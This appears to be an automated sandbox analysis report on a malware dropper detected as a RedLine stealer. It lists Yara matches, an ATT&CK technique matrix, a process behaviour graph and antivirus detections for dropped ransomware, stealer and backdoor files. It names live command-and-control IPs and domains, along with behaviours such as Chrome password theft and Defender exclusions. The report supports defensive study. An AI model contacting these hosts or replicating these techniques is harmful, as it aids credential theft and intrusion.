                  Source: Yara matchFile source: 29.2.Mon179e1058f256.exe.352d6c6.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 29.2.Mon179e1058f256.exe.5c50ee8.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 29.2.Mon179e1058f256.exe.352c7de.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 29.2.Mon179e1058f256.exe.6390000.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.2.Mon17eac6d534bfd22c7.exe.40a56c8.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.2.Mon17eac6d534bfd22c7.exe.40a56c8.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 29.2.Mon179e1058f256.exe.47f3790.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 25.2.Mon17948100733a95c58.exe.39d5068.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 29.2.Mon179e1058f256.exe.352c7de.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 29.2.Mon179e1058f256.exe.47d6458.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 29.2.Mon179e1058f256.exe.6390000.9.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 32.2.Mon17948100733a95c58.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 31.2.Mon17eac6d534bfd22c7.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 29.2.Mon179e1058f256.exe.5c50ee8.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 29.2.Mon179e1058f256.exe.5c50000.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 25.2.Mon17948100733a95c58.exe.39d5068.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 29.2.Mon179e1058f256.exe.47d5570.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 29.2.Mon179e1058f256.exe.47d5570.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 29.3.Mon179e1058f256.exe.18a9250.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000001D.00000002.4162175054.00000000034EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001D.00000002.4167060007.0000000006390000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001F.00000002.4146187466.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001D.00000002.4166034306.0000000005C50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001D.00000003.1802932881.00000000018A9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001D.00000002.4165465602.00000000047D5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000020.00000002.4146181538.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000019.00000002.1780757499.0000000003988000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000002.1820493066.0000000003E41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Mon17eac6d534bfd22c7.exe PID: 7892, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Mon17948100733a95c58.exe PID: 8056, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Mon179e1058f256.exe PID: 8164, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Mon17eac6d534bfd22c7.exe PID: 1308, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Mon17948100733a95c58.exe PID: 4544, type: MEMORYSTR
                  Source: Yara matchFile source: 00000018.00000002.1993787131.0000000001841000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000018.00000002.1990867892.0000000001710000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000002F.00000002.4156074692.0000000003441000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: \Google\Chrome\User Data\Default\Login Data19_2_00007FF72F668E60
                  Source: Yara matchFile source: 29.2.Mon179e1058f256.exe.5c50000.8.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 29.2.Mon179e1058f256.exe.47f3790.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 29.3.Mon179e1058f256.exe.18a9250.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 29.2.Mon179e1058f256.exe.47d6458.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 29.2.Mon179e1058f256.exe.352d6c6.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 29.2.Mon179e1058f256.exe.352d6c6.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 29.2.Mon179e1058f256.exe.5c50ee8.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 29.2.Mon179e1058f256.exe.352c7de.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 29.2.Mon179e1058f256.exe.6390000.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.2.Mon17eac6d534bfd22c7.exe.40a56c8.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.2.Mon17eac6d534bfd22c7.exe.40a56c8.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 29.2.Mon179e1058f256.exe.47f3790.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 25.2.Mon17948100733a95c58.exe.39d5068.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 29.2.Mon179e1058f256.exe.352c7de.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 29.2.Mon179e1058f256.exe.47d6458.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 29.2.Mon179e1058f256.exe.6390000.9.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 32.2.Mon17948100733a95c58.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 31.2.Mon17eac6d534bfd22c7.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 29.2.Mon179e1058f256.exe.5c50ee8.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 29.2.Mon179e1058f256.exe.5c50000.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 25.2.Mon17948100733a95c58.exe.39d5068.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 29.2.Mon179e1058f256.exe.47d5570.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 29.2.Mon179e1058f256.exe.47d5570.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 29.3.Mon179e1058f256.exe.18a9250.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000001D.00000002.4162175054.00000000034EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001D.00000002.4167060007.0000000006390000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001F.00000002.4146187466.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001D.00000002.4166034306.0000000005C50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001D.00000003.1802932881.00000000018A9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001D.00000002.4165465602.00000000047D5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000020.00000002.4146181538.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000019.00000002.1780757499.0000000003988000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000002.1820493066.0000000003E41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Mon17eac6d534bfd22c7.exe PID: 7892, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Mon17948100733a95c58.exe PID: 8056, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Mon179e1058f256.exe PID: 8164, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Mon17eac6d534bfd22c7.exe PID: 1308, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Mon17948100733a95c58.exe PID: 4544, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: 19.0.Mon17c604381c7047e.exe.7ff72f5c0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.Mon17c604381c7047e.exe.7ff72f5c0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.3.setup_installer.exe.320451a.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.3.setup_installer.exe.320451a.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.3.setup_installer.exe.31d6d4a.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000013.00000000.1712308537.00007FF72F6C6000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000002.1994726155.00007FF72F6C6000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000003.1691383572.00000000031C9000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: setup_installer.exe PID: 7608, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Mon17c604381c7047e.exe PID: 7940, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exe, type: DROPPED
                  Source: Yara matchFile source: 00000039.00000002.1968824084.0000000005240000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 1.3.setup_installer.exe.31a1c46.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.3.setup_installer.exe.31a1c46.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 23.0.Mon17b5f403be4d8d6b.exe.9c0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 23.2.Mon17b5f403be4d8d6b.exe.9c0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000001.00000003.1691383572.00000000031A1000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17b5f403be4d8d6b.exe, type: DROPPED
                  Source: Yara matchFile source: 29.2.Mon179e1058f256.exe.5c50000.8.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 29.2.Mon179e1058f256.exe.47f3790.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 29.3.Mon179e1058f256.exe.18a9250.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 29.2.Mon179e1058f256.exe.47d6458.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 29.2.Mon179e1058f256.exe.352d6c6.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 29.2.Mon179e1058f256.exe.352d6c6.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 29.2.Mon179e1058f256.exe.5c50ee8.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 29.2.Mon179e1058f256.exe.352c7de.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 29.2.Mon179e1058f256.exe.6390000.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.2.Mon17eac6d534bfd22c7.exe.40a56c8.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.2.Mon17eac6d534bfd22c7.exe.40a56c8.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 29.2.Mon179e1058f256.exe.47f3790.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 25.2.Mon17948100733a95c58.exe.39d5068.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 29.2.Mon179e1058f256.exe.352c7de.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 29.2.Mon179e1058f256.exe.47d6458.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 29.2.Mon179e1058f256.exe.6390000.9.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 32.2.Mon17948100733a95c58.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 31.2.Mon17eac6d534bfd22c7.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 29.2.Mon179e1058f256.exe.5c50ee8.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 29.2.Mon179e1058f256.exe.5c50000.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 25.2.Mon17948100733a95c58.exe.39d5068.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 29.2.Mon179e1058f256.exe.47d5570.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 29.2.Mon179e1058f256.exe.47d5570.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 29.3.Mon179e1058f256.exe.18a9250.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000001D.00000002.4162175054.00000000034EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001D.00000002.4167060007.0000000006390000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001F.00000002.4146187466.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001D.00000002.4166034306.0000000005C50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001D.00000003.1802932881.00000000018A9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001D.00000002.4165465602.00000000047D5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000020.00000002.4146181538.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000019.00000002.1780757499.0000000003988000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000002.1820493066.0000000003E41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Mon17eac6d534bfd22c7.exe PID: 7892, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Mon17948100733a95c58.exe PID: 8056, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Mon179e1058f256.exe PID: 8164, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Mon17eac6d534bfd22c7.exe PID: 1308, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Mon17948100733a95c58.exe PID: 4544, type: MEMORYSTR
                  Source: Yara matchFile source: 00000018.00000002.1993787131.0000000001841000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000018.00000002.1990867892.0000000001710000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000002F.00000002.4156074692.0000000003441000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeCode function: 18_2_00851F00 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ,new,18_2_00851F00
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeCode function: 18_2_00851880 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ,18_2_00851880
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
                  Windows Management Instrumentation
                  1
                  DLL Side-Loading
                  1
                  Exploitation for Privilege Escalation
                  111
                  Disable or Modify Tools
                  1
                  OS Credential Dumping
                  12
                  System Time Discovery
                  Remote Services1
                  Archive Collected Data
                  1
                  Web Service
                  Exfiltration Over Other Network Medium1
                  System Shutdown/Reboot
                  CredentialsDomainsDefault Accounts1
                  Native API
                  Boot or Logon Initialization Scripts1
                  DLL Side-Loading
                  1
                  Deobfuscate/Decode Files or Information
                  1
                  Credentials In Files
                  3
                  File and Directory Discovery
                  Remote Desktop Protocol1
                  Email Collection
                  3
                  Ingress Tool Transfer
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts1
                  Exploitation for Client Execution
                  Logon Script (Windows)1
                  Access Token Manipulation
                  4
                  Obfuscated Files or Information
                  Security Account Manager149
                  System Information Discovery
                  SMB/Windows Admin Shares1
                  Clipboard Data
                  11
                  Encrypted Channel
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal Accounts12
                  Command and Scripting Interpreter
                  Login Hook412
                  Process Injection
                  24
                  Software Packing
                  NTDS1
                  Query Registry
                  Distributed Component Object ModelInput Capture1
                  Non-Standard Port
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  Timestomp
                  LSA Secrets561
                  Security Software Discovery
                  SSHKeylogging4
                  Non-Application Layer Protocol
                  Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  DLL Side-Loading
                  Cached Domain Credentials2
                  Process Discovery
                  VNCGUI Input Capture115
                  Application Layer Protocol
                  Data Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
                  Masquerading
                  DCSync251
                  Virtualization/Sandbox Evasion
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job251
                  Virtualization/Sandbox Evasion
                  Proc Filesystem1
                  Application Window Discovery
                  Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                  Access Token Manipulation
                  /etc/passwd and /etc/shadow1
                  System Network Configuration Discovery
                  Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron412
                  Process Injection
                  Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
                  Hidden Files and Directories
                  Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                  Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task1
                  Rundll32
                  KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1496480 Sample: abc0f6a2936703cd32608e7a0c0... Startdate: 21/08/2024 Architecture: WINDOWS Score: 100 106 pastebin.com 2->106 108 hsiens.xyz 2->108 110 11 other IPs or domains 2->110 132 Multi AV Scanner detection for domain / URL 2->132 134 Suricata IDS alerts for network traffic 2->134 136 Found malware configuration 2->136 142 26 other signatures 2->142 15 abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe 10 2->15         started        18 svchost.exe 2->18         started        signatures3 138 Connects to a pastebin service (likely for C&C) 106->138 140 Performs DNS queries to domains with low reputation 108->140 process4 file5 104 C:\Users\user\AppData\...\setup_installer.exe, PE32 15->104 dropped 20 setup_installer.exe 19 15->20         started        process6 file7 92 C:\Users\user\AppData\...\setup_install.exe, PE32 20->92 dropped 94 C:\Users\user\AppData\...\libwinpthread-1.dll, PE32 20->94 dropped 96 C:\Users\user\AppData\...\libstdc++-6.dll, PE32 20->96 dropped 98 14 other files (13 malicious) 20->98 dropped 144 Multi AV Scanner detection for dropped file 20->144 146 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 20->146 24 setup_install.exe 1 20->24         started        signatures8 process9 dnsIp10 116 127.0.0.1 unknown unknown 24->116 174 Multi AV Scanner detection for dropped file 24->174 176 Adds a directory exclusion to Windows Defender 24->176 28 cmd.exe 1 24->28         started        30 cmd.exe 1 24->30         started        32 cmd.exe 1 24->32         started        34 11 other processes 24->34 signatures11 process12 signatures13 37 Mon17f45359eb9.exe 28->37         started        40 Mon17e1fac3fd3d84b.exe 30->40         started        42 Mon1785436ae78.exe 32->42         started        128 Submitted sample is a known malware sample 34->128 130 Adds a directory exclusion to Windows Defender 34->130 45 Mon179e1058f256.exe 34->45         started        47 Mon17eac6d534bfd22c7.exe 2 34->47         started        49 Mon17948100733a95c58.exe 34->49         started        51 6 other processes 34->51 process14 dnsIp15 148 Antivirus detection for dropped file 37->148 150 Multi AV Scanner detection for dropped file 37->150 152 Detected unpacking (changes PE section rights) 37->152 166 6 other signatures 37->166 53 explorer.exe 37->53 injected 154 Machine Learning detection for dropped file 40->154 58 mshta.exe 40->58         started        118 45.9.20.13, 59968, 59980, 59995 DEDIPATH-LLCUS Russian Federation 42->118 156 Detected unpacking (overwrites its own PE header) 42->156 60 WerFault.exe 42->60         started        62 WerFault.exe 42->62         started        64 WerFault.exe 42->64         started        66 WerFault.exe 42->66         started        120 135.181.129.119, 4805, 59971, 59974 HETZNER-ASDE Germany 45->120 158 Injects a PE file into a foreign processes 47->158 68 Mon17eac6d534bfd22c7.exe 47->68         started        70 Mon17948100733a95c58.exe 49->70         started        122 pastebin.com 172.67.19.24, 443, 59963 CLOUDFLARENETUS United States 51->122 124 ip-api.com 208.95.112.1, 49735, 80 TUT-ASUS United States 51->124 126 6 other IPs or domains 51->126 160 Contains functionality to steal Chrome passwords or cookies 51->160 162 Opens the same file many times (likely Sandbox evasion) 51->162 164 Loading BitLocker PowerShell Module 51->164 72 WmiPrvSE.exe 51->72         started        signatures16 process17 dnsIp18 112 gmpeople.com 188.40.141.211, 59977, 80 HETZNER-ASDE Germany 53->112 100 C:\Users\user\AppData\Roaming\bgjifes, PE32 53->100 dropped 168 System process connects to network (likely due to code injection or exploit) 53->168 170 Benign windows process drops PE files 53->170 172 Hides that the sample has been downloaded from the Internet (zone.identifier) 53->172 74 cmd.exe 58->74         started        114 45.142.215.47, 27643, 59936, 59950 CLOUDSOLUTIONSRU Russian Federation 68->114 77 WerFault.exe 70->77         started        file19 signatures20 process21 file22 102 C:\Users\user\AppData\Local\Temp\09xU.exE, PE32 74->102 dropped 79 09xU.exE 74->79         started        82 conhost.exe 74->82         started        84 taskkill.exe 74->84         started        process23 signatures24 178 Antivirus detection for dropped file 79->178 180 Multi AV Scanner detection for dropped file 79->180 182 Machine Learning detection for dropped file 79->182 86 mshta.exe 79->86         started        88 mshta.exe 79->88         started        process25 process26 90 cmd.exe 88->90         started       

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe71%ReversingLabsWin32.Trojan.Redlinestealer
                  abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe69%VirustotalBrowse
                  abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe100%AviraHEUR/AGEN.1338886
                  abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe100%Joe Sandbox ML
                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17b5f403be4d8d6b.exe100%AviraHEUR/AGEN.1312411
                  C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe100%AviraTR/ATRAPS.Gen
                  C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17948100733a95c58.exe100%AviraHEUR/AGEN.1323370
                  C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe100%AviraHEUR/AGEN.1316578
                  C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exe100%AviraHEUR/AGEN.1311469
                  C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe100%AviraTR/Redcap.vadxp
                  C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17f45359eb9.exe100%AviraHEUR/AGEN.1316578
                  C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exe100%AviraHEUR/AGEN.1316578
                  C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exe100%AviraHEUR/AGEN.1305985
                  C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exe100%AviraHEUR/AGEN.1318610
                  C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exe100%AviraHEUR/AGEN.1323370
                  C:\Users\user\AppData\Local\Temp\09xU.exE100%AviraTR/Redcap.vadxp
                  C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17948100733a95c58.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17f45359eb9.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Temp\09xU.exE100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Temp\09xU.exE58%ReversingLabsWin32.Adware.RedCap
                  C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exe68%ReversingLabsWin32.Trojan.Generic
                  C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe92%ReversingLabsWin32.Ransomware.StopCrypt
                  C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe92%ReversingLabsByteCode-MSIL.Trojan.SmallDownloader
                  C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17948100733a95c58.exe81%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                  C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exe81%ReversingLabsByteCode-MSIL.Infostealer.ClipBanker
                  C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exe84%ReversingLabsWin32.Trojan.Tnega
                  C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17b5f403be4d8d6b.exe66%ReversingLabsWin32.Trojan.Generic
                  C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exe85%ReversingLabsWin64.Backdoor.TurtleLoader
                  C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe58%ReversingLabsWin32.Adware.RedCap
                  C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exe88%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                  C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17f45359eb9.exe88%ReversingLabsWin32.Ransomware.StopCrypt
                  C:\Users\user\AppData\Local\Temp\7zS8BD79F65\libcurl.dll13%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\7zS8BD79F65\libcurlpp.dll18%ReversingLabsWin32.Trojan.Generic
                  C:\Users\user\AppData\Local\Temp\7zS8BD79F65\libgcc_s_dw2-1.dll0%ReversingLabs
